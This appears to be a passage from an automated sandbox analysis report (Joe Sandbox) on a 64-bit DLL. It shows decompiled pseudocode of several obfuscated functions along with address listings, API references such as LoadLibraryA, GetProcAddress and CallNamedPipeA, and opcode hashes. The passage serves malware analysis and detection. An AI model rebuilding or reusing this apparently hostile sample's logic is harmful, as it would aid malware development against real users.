				signed int _t145;
				signed int _t199;
				signed int _t205;
				intOrPtr _t206;
				signed int _t209;
				signed int _t211;
				signed short* _t239;
				void* _t241;
				signed long long _t242;
				void* _t246;
				signed long long _t248;
				void* _t250;
				CHAR* _t253;
				void* _t256;
				void* _t258;
				void* _t259;
				signed short* _t262;
				void* _t267;
				void* _t271;
				void* _t273;
				void* _t275;
				void* _t277;

				_t267 = __r10;
				_t265 = __r9;
				_t246 = __rdx;
				_t241 = __rcx;
				 *((long long*)(_t258 + 0x18)) = __rbx;
				 *(_t258 + 0x20) = r9d;
				 *((intOrPtr*)(_t258 + 8)) = __ecx;
				_t259 = _t258 - 0x90;
				r12d =  *(_t259 + 0x100);
				r10d = __rdx + 0x354;
				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
				r15d = r9d;
				 *(_t259 + 0x74) = __rdx - 0x3595;
				r13d = __rax - 0x228c;
				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
				r11d = _t271 + 0x14c1;
				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
				r14d = _t277 - 0x12f1;
				 *(_t259 + 0x7c) = r11d;
				 *(_t259 + 0x108) = _t277 - 0x145b;
				 *(_t259 + 0x80) = r14d;
				r9d = __rax - 0x11a9;
				r8d = __rax - 0x923;
				 *(_t259 + 0xd8) = r9d;
				 *(_t259 + 0x70) = r8d;
				_t206 = __rax - 0x11a9;
				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
				 *(_t259 + 0x110) = __rax + 0x984;
				if (r14d - _t256 + 0x106 < 0) goto 0x130fa261;
				if (r15d == _t275 + 0x1663) goto 0x130fa261;
				_t239[0xac] = _t239[0x11e];
				r10d = r10d - 0x283;
				r8d = 0x343a;
				r9d = 0x329d;
				 *(_t259 + 0x88) = r10d;
				 *(_t259 + 0x50) = 0x13118090;
				 *(_t259 + 0x48) = 0x7d;
				 *(_t259 + 0x40) = 0x1a;
				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
				 *(_t259 + 0x30) = 0x1e0;
				 *(_t259 + 0x28) = 0x3666;
				 *(_t259 + 0x20) = _t239;
				_t143 = E00007FFC7FFC130FF290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
				r9d =  *(_t259 + 0xf8);
				r8d =  *(_t259 + 0x110);
				r11d = _t253 - 0x1956;
				r12d = _t250 + 0x1309;
				r10d = _t273 + 0x23f6;
				r14d = _t273 + 0x30d5;
				_t239[0x11e] = _t143;
				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
				r15d = r15d + 0xfffffbb6;
				 *(_t259 + 0x58) = r10d;
				r9d = r9d + 0xfffffc44;
				 *(_t259 + 0x50) = r11d;
				r8d = r8d + 0xfffff9e1;
				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
				 *(_t259 + 0x38) = _t206 + 0x1669;
				 *(_t259 + 0x30) = r14d;
				 *(_t259 + 0x28) = _t239;
				 *(_t259 + 0x20) = r15d;
				_t145 = E00007FFC7FFC130E90B0(0x13118090, _t239, _t241, _t246, __r8, __r11);
				r14d =  *(_t259 + 0x80);
				r8d =  *(_t259 + 0x74);
				r11d =  *(_t259 + 0x108);
				r8d = r8d + 0x27b2;
				r9d =  *(_t259 + 0x70);
				r11d =  &(r11d[0x9ed]);
				r10d = _t275 + 0x119f;
				 *(_t259 + 0xf8) = _t145;
				r9d = r9d + 0xfffff951;
				 *(_t259 + 0x48) = _t273 + 0x38e9;
				 *(_t259 + 0x40) = r8d;
				_t262 = _t239;
				 *(_t259 + 0x38) = r12d;
				 *(_t259 + 0x30) = r10d;
				 *(_t259 + 0x28) = r11d;
				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
				E00007FFC7FFC130E2390(0x13118090, _t239, _t241, _t246, _t262, _t265, _t271); // executed
				r8d =  *(_t259 + 0x70);
				r9d =  *(_t259 + 0xd8);
				r12d =  *(_t259 + 0x100);
				r15d =  *(_t259 + 0xe8);
				r11d =  *(_t259 + 0x7c);
				r10d =  *(_t259 + 0x88);
				if (r12d - _t273 + 0x27b2 >= 0) goto 0x130fa3c0;
				if (r13d - _t271 + 0x216 >= 0) goto 0x130fa31a;
				r11d = _t250 + 0x526;
				r10d = _t262 - 0x526;
				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
				_t205 =  &(_t262[0x644]);
				 *(_t259 + 0x58) = r10d;
				r15d = _t241 + 0x11ae;
				 *(_t259 + 0x50) = r11d;
				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
				 *(_t259 + 0x48) = _t239;
				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
				 *(_t259 + 0x40) = _t199;
				r14d = r14d + 0xcdf;
				 *(_t259 + 0x38) = _t205;
				r9d = r9d + 0x4ca;
				 *(_t259 + 0x30) = _t209;
				r8d = r8d + 0xfffffde6;
				 *(_t259 + 0x28) = r14d;
				 *(_t259 + 0x20) = r15d;
				E00007FFC7FFC130F75E0(0x13118090, _t241, _t246);
				goto 0x130fa47d;
				_t242 = _t239[0x80];
				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x130fa340;
				_t211 = _t209 & _t239[0xf0] & 0x00003189;
				r12d = r12d + _t211;
				_t248 = _t239[0x114] & r9d;
				if (r13d - _t248 < 0) goto 0x130fa47d;
				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x130fa39c;
				r12d = r12d - (r15d | 0x000027b2);
				 *_t239 =  *_t239 - _t242;
				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
				goto 0x130fa3af;
				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
				r13d = r13d + 2;
				if (r13d - _t248 >= 0) goto 0x130fa366;
				goto 0x130fa47d;
				if (_t239[0x10c] - _t242 >= 0) goto 0x130fa47d;
				r12d =  *(_t259 + 0x70);
				asm("o16 nop [eax+eax]");
				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
				r9d = r9d * (r11w & 0xffffffff);
				r8d = _t239[0xc4] * r12d * 0x30d5;
				CallNamedPipeA(_t253, _t256, ??, ??, ??);
				r11d =  *(_t259 + 0x7c);
				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x130fa3f0;
				r12d =  *(_t259 + 0x100);
				return _t271 + 0xb3d;
			}





























                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f80
                                0x7ffc130f9f85
                                0x7ffc130f9f8a
                                0x7ffc130f9f99
                                0x7ffc130f9fad
                                0x7ffc130f9fb5
                                0x7ffc130f9fbc
                                0x7ffc130f9fc4
                                0x7ffc130f9fcd
                                0x7ffc130f9fd1
                                0x7ffc130f9fd8
                                0x7ffc130f9fe4
                                0x7ffc130f9fec
                                0x7ffc130f9ff0
                                0x7ffc130fa005
                                0x7ffc130fa00a
                                0x7ffc130fa011
                                0x7ffc130fa019
                                0x7ffc130fa020
                                0x7ffc130fa027
                                0x7ffc130fa036
                                0x7ffc130fa03b
                                0x7ffc130fa047
                                0x7ffc130fa054
                                0x7ffc130fa05e
                                0x7ffc130fa06e
                                0x7ffc130fa080
                                0x7ffc130fa087
                                0x7ffc130fa095
                                0x7ffc130fa098
                                0x7ffc130fa09e
                                0x7ffc130fa0b3
                                0x7ffc130fa0be
                                0x7ffc130fa0c3
                                0x7ffc130fa0c8
                                0x7ffc130fa0d1
                                0x7ffc130fa0d9
                                0x7ffc130fa0e1
                                0x7ffc130fa0e6
                                0x7ffc130fa0eb
                                0x7ffc130fa0f9
                                0x7ffc130fa101
                                0x7ffc130fa10f
                                0x7ffc130fa11a
                                0x7ffc130fa125
                                0x7ffc130fa12c
                                0x7ffc130fa144
                                0x7ffc130fa14e
                                0x7ffc130fa152
                                0x7ffc130fa159
                                0x7ffc130fa15e
                                0x7ffc130fa165
                                0x7ffc130fa16a
                                0x7ffc130fa171
                                0x7ffc130fa17b
                                0x7ffc130fa182
                                0x7ffc130fa186
                                0x7ffc130fa18b
                                0x7ffc130fa190
                                0x7ffc130fa195
                                0x7ffc130fa19a
                                0x7ffc130fa1a2
                                0x7ffc130fa1a7
                                0x7ffc130fa1af
                                0x7ffc130fa1b6
                                0x7ffc130fa1bb
                                0x7ffc130fa1c9
                                0x7ffc130fa1db
                                0x7ffc130fa1ef
                                0x7ffc130fa1f6
                                0x7ffc130fa200
                                0x7ffc130fa205
                                0x7ffc130fa208
                                0x7ffc130fa20d
                                0x7ffc130fa212
                                0x7ffc130fa217
                                0x7ffc130fa21b
                                0x7ffc130fa220
                                0x7ffc130fa227
                                0x7ffc130fa22f
                                0x7ffc130fa23e
                                0x7ffc130fa24d
                                0x7ffc130fa259
                                0x7ffc130fa26b
                                0x7ffc130fa27c
                                0x7ffc130fa289
                                0x7ffc130fa2a5
                                0x7ffc130fa2ac
                                0x7ffc130fa2b0
                                0x7ffc130fa2b7
                                0x7ffc130fa2bc
                                0x7ffc130fa2c3
                                0x7ffc130fa2c8
                                0x7ffc130fa2ce
                                0x7ffc130fa2d3
                                0x7ffc130fa2d9
                                0x7ffc130fa2dd
                                0x7ffc130fa2e4
                                0x7ffc130fa2e8
                                0x7ffc130fa2ef
                                0x7ffc130fa2f3
                                0x7ffc130fa2fa
                                0x7ffc130fa30b
                                0x7ffc130fa310
                                0x7ffc130fa315
                                0x7ffc130fa31a
                                0x7ffc130fa32f
                                0x7ffc130fa337
                                0x7ffc130fa33d
                                0x7ffc130fa34a
                                0x7ffc130fa353
                                0x7ffc130fa369
                                0x7ffc130fa373
                                0x7ffc130fa390
                                0x7ffc130fa396
                                0x7ffc130fa39a
                                0x7ffc130fa3ab
                                0x7ffc130fa3af
                                0x7ffc130fa3b9
                                0x7ffc130fa3bb
                                0x7ffc130fa3dc
                                0x7ffc130fa3e2
                                0x7ffc130fa3ea
                                0x7ffc130fa41d
                                0x7ffc130fa422
                                0x7ffc130fa42a
                                0x7ffc130fa443
                                0x7ffc130fa44a
                                0x7ffc130fa45e
                                0x7ffc130fa46f
                                0x7ffc130fa475
                                0x7ffc130fa49f

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CallNamedPipe
                                • String ID: f6$}
                                • API String ID: 1741058652-3232957126
                                • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction ID: 4a912ea950d157e64f95df2e8f679c6dc8f7e96f2cdfa83a0d30918d97e2c507
                                • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction Fuzzy Hash: D9D18B736196C58BD724CF14E4447EABBA8F388758F104129EB8917B98DB7CE695CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E4820 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E00007FFC7FFC130E4820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
				void* __rsi;
				void* __rbp;
				void* __r13;
				void* __r15;
				signed int _t132;
				signed int _t134;
				signed int _t168;
				signed int _t183;
				signed int _t188;
				signed int _t190;
				signed int _t200;
				signed long long _t217;
				signed int _t219;
				signed long long _t223;
				signed long long _t226;
				void* _t235;
				void* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t244;
				void* _t247;
				void* _t248;
				long long _t249;
				void* _t251;
				void* _t253;
				signed int _t254;
				void* _t256;
				CHAR* _t258;
				signed long long _t259;

				_t247 = __r10;
				_t246 = __r9;
				_t244 = __r8;
				_t221 = __rcx;
				_t218 = __rbx;
				 *((long long*)(_t241 + 0x10)) = __rbx;
				 *(_t241 + 0x20) = r9d;
				_push(_t239);
				_push(_t237);
				_push(_t235);
				_push(_t251);
				_push(_t253);
				_push(_t256);
				_t242 = _t241 - 0x80;
				r10d = __r9 - 0x3666;
				r12d =  *(_t242 + 0xf8);
				r14d = __r9 - 0x22c;
				 *(_t242 + 0xc0) = r10d;
				r8d =  *(_t242 + 0xe8);
				_t9 = _t221 - 0x27b2; // 0x0
				r8d = r8d + 0xffffee57;
				 *(_t242 + 0xd0) = _t9;
				 *(_t242 + 0x68) = r8d;
				r9d = __rax + 0x1563;
				r12d = r12d + 0x984;
				r13d = __rax - 0x2103;
				 *(_t242 + 0xe8) = r9d;
				_t132 = __r10 + 0x23f6;
				 *(_t242 + 0x60) = _t132;
				if (r9d - _t132 <= 0) goto 0x130e4ab2;
				r8d = _t256 - 0x2b1;
				r10d = r10d + 0x37e1;
				r11d = _t253 + 0x38e9;
				_t254 =  *((intOrPtr*)(_t242 + 0x118));
				_t21 = _t239 + 0x2598; // 0x2598
				 *(_t242 + 0x48) = _t21;
				 *(_t242 + 0x40) = _t235 - 0x44a;
				r15d = _t256 - 0x11ae;
				 *(_t242 + 0x38) = r8d;
				_t27 = _t239 + 0x228c; // 0x228c
				r9d = _t27;
				 *(_t242 + 0x30) = r10d;
				 *(_t242 + 0x28) = r15d;
				 *(_t242 + 0x20) = r11d;
				_t134 = E00007FFC7FFC130FAA10(__rax, __rcx, _t254, __r8, __r9, _t258); // executed
				r8d =  *(_t242 + 0xe8);
				r10d = _t251 - 0x278;
				r12d =  *(_t242 + 0xd0);
				_t168 = __rbx - 0x150e;
				 *(_t242 + 0x50) = _t168;
				r14d = _t134;
				 *(_t242 + 0x48) = _t168;
				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
				r9d = _t251 + 0x27ae;
				r11d = _t237 + 0x189;
				 *(_t242 + 0x38) =  *(_t242 + 0x60);
				_t200 = _t237 + 0x495;
				 *(_t242 + 0x30) = r10d;
				 *(_t242 + 0x28) = r11d;
				r8d = r8d + 0x283;
				 *(_t242 + 0x20) = _t254;
				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
				E00007FFC7FFC130E7120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
				LoadLibraryA(_t258);
				r10d = __rbx + 0x2ad;
				r11d = _t251 + 0x37e1;
				 *(_t242 + 0x50) = _t200;
				 *((long long*)(_t254 + 0x268)) = __rax;
				_t58 = _t237 + 0x1270; // 0x1270
				_t188 = _t58;
				_t60 = _t256 + 0x81; // 0x81
				r8d = _t60;
				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
				r9d = r15d;
				 *(_t242 + 0x48) = _t251 + 0x329d;
				 *(_t242 + 0x40) = r10d;
				 *(_t242 + 0x38) = r11d;
				 *(_t242 + 0x30) = _t235 + 0x1011;
				 *(_t242 + 0x28) = _t188;
				 *(_t242 + 0x20) = _t254;
				E00007FFC7FFC130E2730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
				r8d =  *(_t242 + 0xd8);
				_t71 = _t256 - 0x1270; // -4720
				r10d =  *(_t242 + 0xc0);
				 *(_t242 + 0x48) = r8d;
				_t75 = _t256 - 0xeb4; // -3764
				r11d = _t75;
				 *(_t242 + 0x40) = _t71;
				_t77 = _t237 + 0xcdf; // 0xcdf
				r9d = _t77;
				 *(_t242 + 0x38) = _t251 + 0x2103;
				r10d = r10d + 0x3a59;
				 *(_t242 + 0x30) = r10d;
				 *(_t242 + 0x28) = r11d;
				 *(_t242 + 0x20) = _t244 + 0x3f3;
				E00007FFC7FFC130E1000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
				goto 0x130e4c65;
				_t219 =  *((intOrPtr*)(_t242 + 0x118));
				_t259 = r12d;
				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x130e4ae9;
				if (r12d - (r8d & r12d) > 0) goto 0x130e4ae9;
				_t223 = r10d;
				 *(_t242 + 0x60) = _t223;
				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x130e4c5f;
				_t183 = r9d ^ r12d;
				 *(_t242 + 0xd8) = _t183;
				_t249 = r9d * 0x36e7;
				 *((long long*)(_t242 + 0x70)) = _t249;
				 *(_t242 + 0x100) = r14d | 0x00001f2c;
				asm("o16 nop [eax+eax]");
				r8d = r8d *  *(_t219 + 0x40);
				_t217 =  *(_t219 + 0xc8) + _t249;
				r11d =  *(_t219 + 0x1c0);
				r11d = r11d + 0x1f2c;
				_t226 = r13d & _t259 ^ _t217;
				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
				 *(_t219 + 0xc8) = _t226;
				 *(_t242 + 0xf8) = _t190;
				r13d = r13d |  *(_t219 + 0x188) | _t183;
				r10d = _t217 + _t226;
				r9d =  *(_t242 + 0x100);
				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
				r9d = r9d & _t200;
				 *(_t242 + 0x40) = _t219;
				 *(_t242 + 0x38) = r10d;
				 *(_t242 + 0x30) = r11d;
				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
				E00007FFC7FFC130F98F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
				r12d = r12d + 4;
				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
				r9d =  *(_t242 + 0xe8);
				r10d =  *(_t242 + 0xc0);
				r8d =  *(_t242 + 0x68);
				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x130e4b40;
				goto 0x130e4c65;
				_t129 = _t239 + 0x3595; // 0x3595
				return _t129;
			}

































                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4820
                                0x7ffc130e4825
                                0x7ffc130e482a
                                0x7ffc130e482b
                                0x7ffc130e482c
                                0x7ffc130e482d
                                0x7ffc130e482f
                                0x7ffc130e4831
                                0x7ffc130e4835
                                0x7ffc130e4843
                                0x7ffc130e484a
                                0x7ffc130e4852
                                0x7ffc130e485c
                                0x7ffc130e4864
                                0x7ffc130e486c
                                0x7ffc130e4872
                                0x7ffc130e4879
                                0x7ffc130e4883
                                0x7ffc130e4888
                                0x7ffc130e488f
                                0x7ffc130e4896
                                0x7ffc130e489d
                                0x7ffc130e48a5
                                0x7ffc130e48ac
                                0x7ffc130e48b9
                                0x7ffc130e48bf
                                0x7ffc130e48c6
                                0x7ffc130e48cd
                                0x7ffc130e48d4
                                0x7ffc130e48dc
                                0x7ffc130e48e2
                                0x7ffc130e48ec
                                0x7ffc130e48f0
                                0x7ffc130e48f7
                                0x7ffc130e48fc
                                0x7ffc130e48fc
                                0x7ffc130e4903
                                0x7ffc130e490e
                                0x7ffc130e4919
                                0x7ffc130e491e
                                0x7ffc130e4923
                                0x7ffc130e492b
                                0x7ffc130e4933
                                0x7ffc130e4948
                                0x7ffc130e494e
                                0x7ffc130e4952
                                0x7ffc130e4955
                                0x7ffc130e495e
                                0x7ffc130e4962
                                0x7ffc130e496e
                                0x7ffc130e4975
                                0x7ffc130e4979
                                0x7ffc130e497f
                                0x7ffc130e498a
                                0x7ffc130e498f
                                0x7ffc130e4998
                                0x7ffc130e499f
                                0x7ffc130e49a6
                                0x7ffc130e49b4
                                0x7ffc130e49c1
                                0x7ffc130e49cf
                                0x7ffc130e49d7
                                0x7ffc130e49e1
                                0x7ffc130e49e8
                                0x7ffc130e49e8
                                0x7ffc130e49f5
                                0x7ffc130e49f5
                                0x7ffc130e4a08
                                0x7ffc130e4a1d
                                0x7ffc130e4a20
                                0x7ffc130e4a24
                                0x7ffc130e4a29
                                0x7ffc130e4a2e
                                0x7ffc130e4a32
                                0x7ffc130e4a36
                                0x7ffc130e4a3b
                                0x7ffc130e4a40
                                0x7ffc130e4a48
                                0x7ffc130e4a4f
                                0x7ffc130e4a5f
                                0x7ffc130e4a64
                                0x7ffc130e4a64
                                0x7ffc130e4a6b
                                0x7ffc130e4a6f
                                0x7ffc130e4a6f
                                0x7ffc130e4a7d
                                0x7ffc130e4a81
                                0x7ffc130e4a8f
                                0x7ffc130e4a97
                                0x7ffc130e4a9c
                                0x7ffc130e4aa0
                                0x7ffc130e4aad
                                0x7ffc130e4ab2
                                0x7ffc130e4aba
                                0x7ffc130e4acc
                                0x7ffc130e4ad7
                                0x7ffc130e4af4
                                0x7ffc130e4afa
                                0x7ffc130e4b02
                                0x7ffc130e4b12
                                0x7ffc130e4b15
                                0x7ffc130e4b1c
                                0x7ffc130e4b27
                                0x7ffc130e4b2c
                                0x7ffc130e4b37
                                0x7ffc130e4b4a
                                0x7ffc130e4b4f
                                0x7ffc130e4b52
                                0x7ffc130e4b5c
                                0x7ffc130e4b66
                                0x7ffc130e4b72
                                0x7ffc130e4b74
                                0x7ffc130e4b85
                                0x7ffc130e4b92
                                0x7ffc130e4bad
                                0x7ffc130e4bc9
                                0x7ffc130e4bd1
                                0x7ffc130e4bd5
                                0x7ffc130e4bd8
                                0x7ffc130e4bdd
                                0x7ffc130e4be2
                                0x7ffc130e4be7
                                0x7ffc130e4beb
                                0x7ffc130e4bef
                                0x7ffc130e4bfb
                                0x7ffc130e4c12
                                0x7ffc130e4c2b
                                0x7ffc130e4c33
                                0x7ffc130e4c3b
                                0x7ffc130e4c52
                                0x7ffc130e4c5d
                                0x7ffc130e4c5f
                                0x7ffc130e4c7f

                                APIs
                                • LoadLibraryA.KERNEL32 ref: 00007FFC130E49B4
                                  • Part of subcall function 00007FFC130E2730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FFC130E4A40), ref: 00007FFC130E285E
                                  • Part of subcall function 00007FFC130E1000: GetProcAddress.KERNEL32 ref: 00007FFC130E10D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: 62 $662
                                • API String ID: 2238633743-980518382
                                • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction ID: 0e9f889a9c7703fea28eae440d8edf1887b3426929f3d104db7ca2830befe457
                                • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction Fuzzy Hash: AEB18C776186C58BD365CF24E484BDEBBA8F788788F004125EB8957B58DB38EA54CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130ED734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 52%
                                			E00007FFC7FFC130ED734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t27;
				intOrPtr _t36;
				intOrPtr* _t62;
				long long _t68;
				void* _t70;
				long long _t84;
				signed int _t85;
				intOrPtr* _t86;
				void* _t89;

				_t70 = __rcx;
				_a8 = __rbx;
				_t2 = _t70 - 1; // -1
				r14d = __ecx;
				if (_t2 - 1 <= 0) goto 0x130ed768;
				_t27 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t27);
				goto 0x130ed897;
				E00007FFC7FFC130F05F8();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t86 =  *0x13124950; // 0x201640f32a0
				 *0x13124960 = 0x131243e0;
				if (_t86 == 0) goto 0x130ed79f;
				if ( *_t86 != dil) goto 0x130ed7a2;
				_t62 =  &_a32;
				_a24 = _t85;
				_v56 = _t62;
				r8d = 0;
				_a32 = _t85;
				E00007FFC7FFC130ED514(0x131243e0, 0x131243e0, 0x131243e0, _t85, 0x131243e0, _t89, __r8,  &_a24);
				r8d = 1;
				E00007FFC7FFC130ED6D0(_a24, _a32, __r8);
				_t68 = _t62;
				if (_t62 != 0) goto 0x130ed7f3;
				E00007FFC7FFC130EE6A0(_t62);
				_t10 = _t68 + 0xc; // 0xc
				 *_t62 = _t10;
				goto 0x130ed892;
				_v56 =  &_a32;
				E00007FFC7FFC130ED514(_t68, 0x131243e0, _t68, _t85, 0x131243e0, _t89, _t62 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x130ed829;
				_t36 = _a24 - 1;
				 *0x13124940 = _t68;
				 *0x1312493c = _t36;
				goto 0x130ed7ec;
				_a16 = _t85;
				0x130efef4();
				if (_t36 == 0) goto 0x130ed858;
				E00007FFC7FFC130EE114( &_a32, _a16);
				_a16 = _t85;
				E00007FFC7FFC130EE114( &_a32, _t68);
				goto 0x130ed897;
				_t84 = _a16;
				if ( *_t84 == _t85) goto 0x130ed873;
				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x130ed867;
				 *0x1312493c = 0;
				_a16 = _t85;
				 *0x13124940 = _t84;
				E00007FFC7FFC130EE114(_t84 + 8, _t85 + 1);
				_a16 = _t85;
				E00007FFC7FFC130EE114(_t84 + 8, _t68);
				return _t36;
			}
















                                0x7ffc130ed734
                                0x7ffc130ed734
                                0x7ffc130ed747
                                0x7ffc130ed74a
                                0x7ffc130ed750
                                0x7ffc130ed752
                                0x7ffc130ed75c
                                0x7ffc130ed75e
                                0x7ffc130ed763
                                0x7ffc130ed768
                                0x7ffc130ed774
                                0x7ffc130ed77f
                                0x7ffc130ed785
                                0x7ffc130ed78e
                                0x7ffc130ed798
                                0x7ffc130ed79d
                                0x7ffc130ed7a2
                                0x7ffc130ed7a6
                                0x7ffc130ed7ae
                                0x7ffc130ed7b3
                                0x7ffc130ed7b6
                                0x7ffc130ed7bf
                                0x7ffc130ed7c8
                                0x7ffc130ed7d5
                                0x7ffc130ed7da
                                0x7ffc130ed7e0
                                0x7ffc130ed7e2
                                0x7ffc130ed7e7
                                0x7ffc130ed7ea
                                0x7ffc130ed7ee
                                0x7ffc130ed805
                                0x7ffc130ed80a
                                0x7ffc130ed813
                                0x7ffc130ed818
                                0x7ffc130ed81a
                                0x7ffc130ed821
                                0x7ffc130ed827
                                0x7ffc130ed82d
                                0x7ffc130ed834
                                0x7ffc130ed83d
                                0x7ffc130ed843
                                0x7ffc130ed84b
                                0x7ffc130ed84f
                                0x7ffc130ed856
                                0x7ffc130ed858
                                0x7ffc130ed865
                                0x7ffc130ed871
                                0x7ffc130ed873
                                0x7ffc130ed87b
                                0x7ffc130ed87f
                                0x7ffc130ed886
                                0x7ffc130ed88e
                                0x7ffc130ed892
                                0x7ffc130ed8a9

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
